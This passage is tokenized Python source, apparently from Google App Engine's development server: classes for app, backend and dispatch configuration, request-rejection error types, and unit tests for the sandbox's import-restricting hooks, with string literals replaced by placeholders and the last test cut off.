<EOL> return appinfo_includes . ParseAndReturnIncludePaths ( f ) <EOL> class BackendsConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app_yaml_path , backend_yaml_path ) : <EOL> """<STR_LIT>""" <EOL> self . _update_lock = threading . RLock ( ) <EOL> self . _base_server_configuration = ServerConfiguration ( app_yaml_path ) <EOL> backend_info_external = self . _parse_configuration ( <EOL> backend_yaml_path ) <EOL> self . _backends_name_to_backend_entry = { } <EOL> for backend in backend_info_external . 
backends or [ ] : <EOL> self . _backends_name_to_backend_entry [ backend . name ] = backend <EOL> self . _changes = dict ( <EOL> ( backend_name , set ( ) ) <EOL> for backend_name in self . _backends_name_to_backend_entry ) <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : <EOL> return backendinfo . LoadBackendInfo ( f ) <EOL> def get_backend_configurations ( self ) : <EOL> return [ BackendConfiguration ( self . _base_server_configuration , self , entry ) <EOL> for entry in self . _backends_name_to_backend_entry . values ( ) ] <EOL> def check_for_updates ( self , backend_name ) : <EOL> """<STR_LIT>""" <EOL> with self . _update_lock : <EOL> server_changes = self . _base_server_configuration . check_for_updates ( ) <EOL> if server_changes : <EOL> for backend_changes in self . _changes . values ( ) : <EOL> backend_changes . update ( server_changes ) <EOL> changes = self . _changes [ backend_name ] <EOL> self . _changes [ backend_name ] = set ( ) <EOL> return changes <EOL> class BackendConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , server_configuration , backends_configuration , <EOL> backend_entry ) : <EOL> """<STR_LIT>""" <EOL> self . _server_configuration = server_configuration <EOL> self . _backends_configuration = backends_configuration <EOL> self . _backend_entry = backend_entry <EOL> if backend_entry . dynamic : <EOL> self . _basic_scaling = appinfo . BasicScaling ( <EOL> max_instances = backend_entry . instances or <NUM_LIT:1> ) <EOL> self . _manual_scaling = None <EOL> else : <EOL> self . _basic_scaling = None <EOL> self . _manual_scaling = appinfo . ManualScaling ( <EOL> instances = backend_entry . instances or <NUM_LIT:1> ) <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> @ property <EOL> def application_root ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
_server_configuration . application_root <EOL> @ property <EOL> def application ( self ) : <EOL> return self . _server_configuration . application <EOL> @ property <EOL> def api_version ( self ) : <EOL> return self . _server_configuration . api_version <EOL> @ property <EOL> def server_name ( self ) : <EOL> return self . _backend_entry . name <EOL> @ property <EOL> def major_version ( self ) : <EOL> return self . _server_configuration . major_version <EOL> @ property <EOL> def version_id ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . server_name , <EOL> self . major_version , <EOL> self . _minor_version_id ) <EOL> @ property <EOL> def runtime ( self ) : <EOL> return self . _server_configuration . runtime <EOL> @ property <EOL> def threadsafe ( self ) : <EOL> return self . _server_configuration . threadsafe <EOL> @ property <EOL> def basic_scaling ( self ) : <EOL> return self . _basic_scaling <EOL> @ property <EOL> def manual_scaling ( self ) : <EOL> return self . _manual_scaling <EOL> @ property <EOL> def automatic_scaling ( self ) : <EOL> return None <EOL> @ property <EOL> def normalized_libraries ( self ) : <EOL> return self . _server_configuration . normalized_libraries <EOL> @ property <EOL> def skip_files ( self ) : <EOL> return self . _server_configuration . skip_files <EOL> @ property <EOL> def nobuild_files ( self ) : <EOL> return self . _server_configuration . nobuild_files <EOL> @ property <EOL> def error_handlers ( self ) : <EOL> return self . _server_configuration . error_handlers <EOL> @ property <EOL> def handlers ( self ) : <EOL> if self . _backend_entry . start : <EOL> return [ appinfo . URLMap ( <EOL> url = '<STR_LIT>' , <EOL> script = self . _backend_entry . start , <EOL> login = '<STR_LIT>' ) ] + self . _server_configuration . handlers <EOL> return self . _server_configuration . handlers <EOL> @ property <EOL> def inbound_services ( self ) : <EOL> return self . _server_configuration . 
inbound_services <EOL> @ property <EOL> def env_variables ( self ) : <EOL> return self . _server_configuration . env_variables <EOL> @ property <EOL> def is_backend ( self ) : <EOL> return True <EOL> def check_for_updates ( self ) : <EOL> """<STR_LIT>""" <EOL> changes = self . _backends_configuration . check_for_updates ( <EOL> self . _backend_entry . name ) <EOL> if changes : <EOL> self . _minor_version_id = '<STR_LIT>' . join ( random . choice ( string . digits ) for _ in <EOL> range ( <NUM_LIT> ) ) <EOL> return changes <EOL> class DispatchConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , yaml_path ) : <EOL> self . _yaml_path = yaml_path <EOL> self . _mtime = os . path . getmtime ( self . _yaml_path ) <EOL> self . _process_dispatch_entries ( self . _parse_configuration ( self . _yaml_path ) ) <EOL> @ staticmethod <EOL> def _parse_configuration ( configuration_path ) : <EOL> with open ( configuration_path ) as f : <EOL> return dispatchinfo . LoadSingleDispatch ( f ) <EOL> def check_for_updates ( self ) : <EOL> mtime = os . path . getmtime ( self . _yaml_path ) <EOL> if mtime > self . _mtime : <EOL> self . _mtime = mtime <EOL> try : <EOL> dispatch_info_external = self . _parse_configuration ( self . _yaml_path ) <EOL> except Exception , e : <EOL> failure_message = str ( e ) <EOL> logging . error ( '<STR_LIT>' , failure_message ) <EOL> return <EOL> self . _process_dispatch_entries ( dispatch_info_external ) <EOL> def _process_dispatch_entries ( self , dispatch_info_external ) : <EOL> path_only_entries = [ ] <EOL> hostname_entries = [ ] <EOL> for entry in dispatch_info_external . dispatch : <EOL> parsed_url = dispatchinfo . ParsedURL ( entry . url ) <EOL> if parsed_url . host : <EOL> hostname_entries . append ( entry ) <EOL> else : <EOL> path_only_entries . append ( ( parsed_url , entry . server ) ) <EOL> if hostname_entries : <EOL> logging . warning ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . 
join ( str ( entry ) for entry in hostname_entries ) ) <EOL> self . _entries = path_only_entries <EOL> @ property <EOL> def dispatch ( self ) : <EOL> return self . _entries <EOL> class ApplicationConfiguration ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , yaml_paths ) : <EOL> """<STR_LIT>""" <EOL> self . servers = [ ] <EOL> self . dispatch = None <EOL> if len ( yaml_paths ) == <NUM_LIT:1> and os . path . isdir ( yaml_paths [ <NUM_LIT:0> ] ) : <EOL> directory_path = yaml_paths [ <NUM_LIT:0> ] <EOL> for app_yaml_path in [ os . path . join ( directory_path , '<STR_LIT>' ) , <EOL> os . path . join ( directory_path , '<STR_LIT>' ) ] : <EOL> if os . path . exists ( app_yaml_path ) : <EOL> yaml_paths = [ app_yaml_path ] <EOL> break <EOL> else : <EOL> raise errors . AppConfigNotFoundError ( <EOL> '<STR_LIT>' % directory_path ) <EOL> for backends_yaml_path in [ os . path . join ( directory_path , '<STR_LIT>' ) , <EOL> os . path . join ( directory_path , '<STR_LIT>' ) ] : <EOL> if os . path . exists ( backends_yaml_path ) : <EOL> yaml_paths . append ( backends_yaml_path ) <EOL> break <EOL> for yaml_path in yaml_paths : <EOL> if os . path . isdir ( yaml_path ) : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' % <EOL> yaml_path ) <EOL> elif ( yaml_path . endswith ( '<STR_LIT>' ) or <EOL> yaml_path . endswith ( '<STR_LIT>' ) ) : <EOL> self . servers . extend ( <EOL> BackendsConfiguration ( yaml_path . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> yaml_path ) . get_backend_configurations ( ) ) <EOL> elif ( yaml_path . endswith ( '<STR_LIT>' ) or <EOL> yaml_path . endswith ( '<STR_LIT>' ) ) : <EOL> if self . dispatch : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' ) <EOL> self . dispatch = DispatchConfiguration ( yaml_path ) <EOL> else : <EOL> server_configuration = ServerConfiguration ( yaml_path ) <EOL> self . servers . append ( server_configuration ) <EOL> application_ids = set ( server . application <EOL> for server in self . 
servers ) <EOL> if len ( application_ids ) > <NUM_LIT:1> : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' % <EOL> '<STR_LIT:U+002CU+0020>' . join ( sorted ( application_ids ) ) ) <EOL> self . _app_id = application_ids . pop ( ) <EOL> server_names = set ( ) <EOL> for server in self . servers : <EOL> if server . server_name in server_names : <EOL> raise errors . InvalidAppConfigError ( '<STR_LIT>' % <EOL> server . server_name ) <EOL> server_names . add ( server . server_name ) <EOL> if self . dispatch : <EOL> if '<STR_LIT:default>' not in server_names : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' ) <EOL> missing_servers = ( <EOL> set ( server_name for _ , server_name in self . dispatch . dispatch ) - <EOL> server_names ) <EOL> if missing_servers : <EOL> raise errors . InvalidAppConfigError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % sorted ( missing_servers ) ) <EOL> @ property <EOL> def app_id ( self ) : <EOL> return self . _app_id </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> _INVALID_ENUM_TEMPLATE = '<STR_LIT>' <EOL> class RequestRejectionError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def message ( self ) : raise NotImplementedError <EOL> def errors ( self ) : raise NotImplementedError <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> return json . dumps ( { <EOL> '<STR_LIT:error>' : { <EOL> '<STR_LIT>' : self . errors ( ) , <EOL> '<STR_LIT:code>' : <NUM_LIT> , <EOL> '<STR_LIT:message>' : self . message ( ) , <EOL> } , <EOL> } ) <EOL> class EnumRejectionError ( RequestRejectionError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , parameter_name , value , allowed_values ) : <EOL> """<STR_LIT>""" <EOL> super ( EnumRejectionError , self ) . __init__ ( ) <EOL> self . parameter_name = parameter_name <EOL> self . value = value <EOL> self . allowed_values = allowed_values <EOL> def message ( self ) : <EOL> """<STR_LIT>""" <EOL> return _INVALID_ENUM_TEMPLATE % ( self . value , self . allowed_values ) <EOL> def errors ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:message>' : self . message ( ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:location>' : self . parameter_name , <EOL> } , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import __builtin__ <EOL> import imp <EOL> import os <EOL> import re <EOL> import sys <EOL> import types <EOL> import urllib <EOL> import unittest <EOL> import google <EOL> try : <EOL> import lxml <EOL> except ImportError : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> try : <EOL> import PIL <EOL> except ImportError : <EOL> raise unittest . SkipTest ( '<STR_LIT>' ) <EOL> import mox <EOL> from google . appengine . tools . devappserver2 import runtime_config_pb2 <EOL> from google . appengine . tools . devappserver2 . python import sandbox <EOL> from google . appengine . tools . devappserver2 . python import stubs <EOL> class SandboxTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( SandboxTest , self ) . setUp ( ) <EOL> self . mox = mox . Mox ( ) <EOL> self . old_path = sys . path <EOL> self . old_meta_path = sys . meta_path <EOL> self . old_library_format_string = sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING <EOL> self . config = runtime_config_pb2 . Config ( ) <EOL> self . app_root = '<STR_LIT>' <EOL> self . config . application_root = self . app_root <EOL> self . config . app_id = '<STR_LIT>' <EOL> self . config . version_id = '<STR_LIT:1>' <EOL> self . builtins = __builtin__ . __dict__ . copy ( ) <EOL> self . modules = sys . modules . copy ( ) <EOL> def tearDown ( self ) : <EOL> sys . modules . clear ( ) <EOL> sys . modules . update ( self . modules ) <EOL> __builtin__ . __dict__ . update ( self . builtins ) <EOL> sys . meta_path = self . old_meta_path <EOL> sys . path = self . old_path <EOL> sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING = self . old_library_format_string <EOL> self . mox . UnsetStubs ( ) <EOL> super ( SandboxTest , self ) . tearDown ( ) <EOL> def test_enable_libraries ( self ) : <EOL> sandbox . _THIRD_PARTY_LIBRARY_FORMAT_STRING = ( <EOL> '<STR_LIT>' ) <EOL> libs = self . config . libraries <EOL> libs . add ( name = '<STR_LIT:foo>' , version = '<STR_LIT>' ) <EOL> libs . 
add ( name = '<STR_LIT>' , version = '<STR_LIT>' ) <EOL> self . assertEqual ( <EOL> [ os . path . join ( os . path . dirname ( os . path . dirname ( <EOL> google . __file__ ) ) , '<STR_LIT>' ) , <EOL> os . path . join ( os . path . dirname ( os . path . dirname ( <EOL> google . __file__ ) ) , '<STR_LIT>' ) ] , <EOL> sandbox . _enable_libraries ( libs ) ) <EOL> def test_enable_libraries_no_libraries ( self ) : <EOL> libs = self . config . libraries <EOL> self . assertEqual ( [ ] , sandbox . _enable_libraries ( libs ) ) <EOL> self . assertEqual ( self . old_path , sys . path ) <EOL> class ModuleOverrideImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ModuleOverrideImportHookTest , self ) . setUp ( ) <EOL> self . test_policies = { } <EOL> self . path = sys . path [ : ] <EOL> self . hook = sandbox . ModuleOverrideImportHook ( self . test_policies ) <EOL> sys . path_importer_cache = { } <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> __import__ ( '<STR_LIT>' ) . __path__ . insert ( <NUM_LIT:0> , '<STR_LIT>' ) <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> self . imported_modules = set ( sys . modules ) <EOL> self . path_hooks = sys . path_hooks <EOL> def tearDown ( self ) : <EOL> sys . path_hooks = self . path_hooks <EOL> sys . path_importer_cache = { } <EOL> sys . path = self . path <EOL> added_modules = set ( sys . modules ) - self . imported_modules <EOL> for name in added_modules : <EOL> del sys . modules [ name ] <EOL> distutils_modules = [ module for module in sys . modules if <EOL> module . startswith ( '<STR_LIT>' ) ] <EOL> for name in distutils_modules : <EOL> del sys . modules [ name ] <EOL> sys . modules . pop ( '<STR_LIT>' , None ) <EOL> super ( ModuleOverrideImportHookTest , self ) . tearDown ( ) <EOL> def test_load_builtin_pass_through ( self ) : <EOL> symbols = dir ( __import__ ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> self . 
test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> thread = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( thread , types . ModuleType ) ) <EOL> self . assertTrue ( isinstance ( thread . __doc__ , str ) ) <EOL> self . assertItemsEqual ( symbols + [ '<STR_LIT>' ] , dir ( thread ) ) <EOL> self . assertEqual ( self . hook , thread . __loader__ ) <EOL> def test_load_builtin_no_pass_through ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = False ) <EOL> thread = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertTrue ( isinstance ( thread , types . ModuleType ) ) <EOL> self . assertItemsEqual ( <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , dir ( thread ) ) <EOL> self . assertEqual ( self . hook , thread . __loader__ ) <EOL> def test_load_with_path_hook ( self ) : <EOL> class DummyPathHook ( object ) : <EOL> def __init__ ( self , path ) : <EOL> if path != '<STR_LIT>' : <EOL> raise ImportError <EOL> def find_module ( self , unused_fullname ) : <EOL> return self <EOL> def load_module ( self , fullname ) : <EOL> return imp . new_module ( '<STR_LIT>' % fullname ) <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> sys . path_hooks = [ DummyPathHook ] <EOL> util = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , util . __name__ ) <EOL> def test_load_with_path_hook_cant_find ( self ) : <EOL> class DummyPathHook ( object ) : <EOL> def __init__ ( self , path ) : <EOL> if path != '<STR_LIT>' : <EOL> raise ImportError <EOL> def find_module ( self , unused_fullname ) : <EOL> return None <EOL> def load_module ( self , fullname ) : <EOL> raise ImportError <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . 
ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> sys . path_hooks = [ DummyPathHook ] <EOL> util = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , util . __name__ ) <EOL> def test_load_without_path_hook ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> urllib = self . hook . load_module ( '<STR_LIT>' ) <EOL> self . assertIn ( '<STR_LIT>' , urllib . __dict__ ) <EOL> self . assertEqual ( '<STR_LIT>' , urllib . __name__ ) <EOL> def test_load_without_path_hook_not_found ( self ) : <EOL> self . test_policies [ '<STR_LIT>' ] = sandbox . ModuleOverridePolicy ( <EOL> None , [ ] , { } , default_pass_through = True ) <EOL> self . assertRaises ( ImportError , self . hook . load_module , '<STR_LIT>' ) <EOL> def test_load_already_in_sys_modules ( self ) : <EOL> module = imp . new_module ( '<STR_LIT:foo>' ) <EOL> sys . modules [ '<STR_LIT:foo>' ] = module <EOL> self . assertEqual ( module , self . hook . load_module ( '<STR_LIT:foo>' ) ) <EOL> def test_is_package ( self ) : <EOL> self . assertTrue ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_standard_lib ( self ) : <EOL> self . assertTrue ( self . hook . is_package ( '<STR_LIT:email>' ) ) <EOL> def test_is_package_not_package_standard_lib ( self ) : <EOL> self . assertFalse ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_not_package ( self ) : <EOL> self . assertFalse ( self . hook . is_package ( '<STR_LIT>' ) ) <EOL> def test_is_package_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . is_package , '<STR_LIT>' ) <EOL> def test_get_source ( self ) : <EOL> with open ( __import__ ( '<STR_LIT>' ) . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) as f : <EOL> source = f . read ( ) <EOL> self . assertEqual ( source , self . hook . 
get_source ( '<STR_LIT>' ) ) <EOL> def test_get_source_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . get_source , '<STR_LIT>' ) <EOL> def test_get_source_standard_library ( self ) : <EOL> self . assertTrue ( self . hook . get_source ( '<STR_LIT>' ) ) <EOL> def test_get_code ( self ) : <EOL> filename = __import__ ( '<STR_LIT>' ) . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( filename ) as f : <EOL> expected_code = compile ( f . read ( ) , filename , '<STR_LIT>' ) <EOL> self . assertEqual ( expected_code , self . hook . get_code ( '<STR_LIT>' ) ) <EOL> def test_get_code_does_not_exist ( self ) : <EOL> self . assertRaises ( ImportError , self . hook . get_code , '<STR_LIT>' ) <EOL> def test_get_code_standard_library ( self ) : <EOL> self . assertTrue ( self . hook . get_code ( '<STR_LIT>' ) ) <EOL> def test_os_module_policy ( self ) : <EOL> hooked_os = imp . new_module ( '<STR_LIT>' ) <EOL> hooked_os . __dict__ . update ( os . __dict__ ) <EOL> sandbox . _MODULE_OVERRIDE_POLICIES [ '<STR_LIT>' ] . apply_policy ( hooked_os . __dict__ ) <EOL> self . assertEqual ( stubs . return_minus_one , hooked_os . getpid ) <EOL> self . assertNotIn ( '<STR_LIT>' , hooked_os . __dict__ ) <EOL> self . assertEqual ( stubs . os_error_not_implemented , hooked_os . unlink ) <EOL> self . assertEqual ( os . walk , hooked_os . walk ) <EOL> class CModuleImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module_enabled_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> lxml = __import__ ( '<STR_LIT>' ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' , lxml . __path__ ) ) <EOL> def test_find_module_disabled_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> self . assertIsNone ( hook . 
find_module ( '<STR_LIT>' ) ) <EOL> lxml = __import__ ( '<STR_LIT>' ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' , lxml . __path__ ) ) <EOL> def test_find_module_not_c_module ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_load_module ( self ) : <EOL> hook = sandbox . CModuleImportHook ( [ ] ) <EOL> self . assertRaises ( ImportError , hook . load_module , '<STR_LIT>' ) <EOL> class BuiltinImportHookTest ( unittest . TestCase ) : <EOL> def test_find_module_whitelisted ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> for name in sandbox . _WHITE_LIST_C_MODULES : <EOL> self . assertIsNone ( hook . find_module ( name ) ) <EOL> def test_find_module_not_whitelisted ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_find_module_not_builtin ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertIsNone ( hook . find_module ( '<STR_LIT>' ) ) <EOL> def test_load_module ( self ) : <EOL> hook = sandbox . BuiltinImportHook ( ) <EOL> self . assertRaises ( ImportError , hook . load_module , '<STR_LIT>' ) <EOL> class PathOverrideImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . saved_lxml = lxml <EOL> self . saved_pil = PIL <EOL> self . saved_urllib = urllib <EOL> def tearDown ( self ) : <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_urllib <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_pil <EOL> sys . modules [ '<STR_LIT>' ] = self . saved_lxml <EOL> def test_package_success ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_lxml = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_lxml . __file__ , lxml . __file__ ) <EOL> self . 
assertEqual ( hooked_lxml . __path__ , lxml . __path__ ) <EOL> self . assertEqual ( hooked_lxml . __loader__ , hook ) <EOL> self . assertEqual ( [ os . path . dirname ( self . saved_lxml . __file__ ) ] , <EOL> hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_package_success_pil_in_sys_path ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_pil = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_pil . __file__ , PIL . __file__ ) <EOL> self . assertEqual ( hooked_pil . __path__ , PIL . __path__ ) <EOL> self . assertEqual ( hooked_pil . __loader__ , hook ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertEqual ( [ os . path . dirname ( self . saved_pil . __file__ ) ] , <EOL> hook . extra_sys_paths ) <EOL> def test_module_success ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( hook , hook . find_module ( '<STR_LIT>' ) ) <EOL> del sys . modules [ '<STR_LIT>' ] <EOL> hooked_urllib = hook . load_module ( '<STR_LIT>' ) <EOL> self . assertEqual ( hooked_urllib . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> urllib . __file__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertEqual ( hooked_urllib . __loader__ , hook ) <EOL> self . assertNotIn ( '<STR_LIT>' , hooked_urllib . __dict__ ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_disabled_modules ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT>' ) ) <EOL> self . assertFalse ( hook . 
find_module ( '<STR_LIT>' ) ) <EOL> def test_module_not_installed ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT:foo>' ] ) <EOL> self . assertFalse ( hook . find_module ( '<STR_LIT:foo>' ) ) <EOL> self . assertFalse ( hook . extra_accessible_paths ) <EOL> self . assertFalse ( hook . extra_sys_paths ) <EOL> def test_import_alread_in_sys_modules ( self ) : <EOL> hook = sandbox . PathOverrideImportHook ( [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( os , hook . load_module ( '<STR_LIT>' ) ) <EOL> class PathRestrictingImportHookTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mox = mox . Mox ( ) <EOL> self . mox . StubOutWithMock ( imp , '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( stubs . FakeFile , '<STR_LIT>' ) <EOL> self . hook = sandbox . PathRestrictingImportHook ( [ re . compile ( r'<STR_LIT>' ) ] ) <EOL> def tearDown ( self ) : <EOL> self . mox . UnsetStubs ( ) <EOL> def test_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_SOURCE ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_module_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . C_EXTENSION ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . 
AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_module_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . C_EXTENSION ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_compiled_python_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_COMPILED ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_compiled_python_not_accessible ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT>' , <EOL> ( None , None , imp . PY_COMPILED ) ) ) <EOL> stubs . FakeFile . is_file_accessible ( '<STR_LIT>' ) . AndReturn ( False ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertEqual ( self . hook , self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_c_builtin ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT:bar>' , <EOL> ( None , None , imp . C_BUILTIN ) ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . find_module ( '<STR_LIT>' , [ '<STR_LIT:foo>' ] ) ) <EOL> def test_py_frozen ( self ) : <EOL> imp . find_module ( '<STR_LIT:bar>' , [ '<STR_LIT:foo>' ] ) . AndReturn ( ( None , '<STR_LIT:bar>' , <EOL> ( None , None , imp . PY_FROZEN ) ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . assertIsNone ( self . hook . 
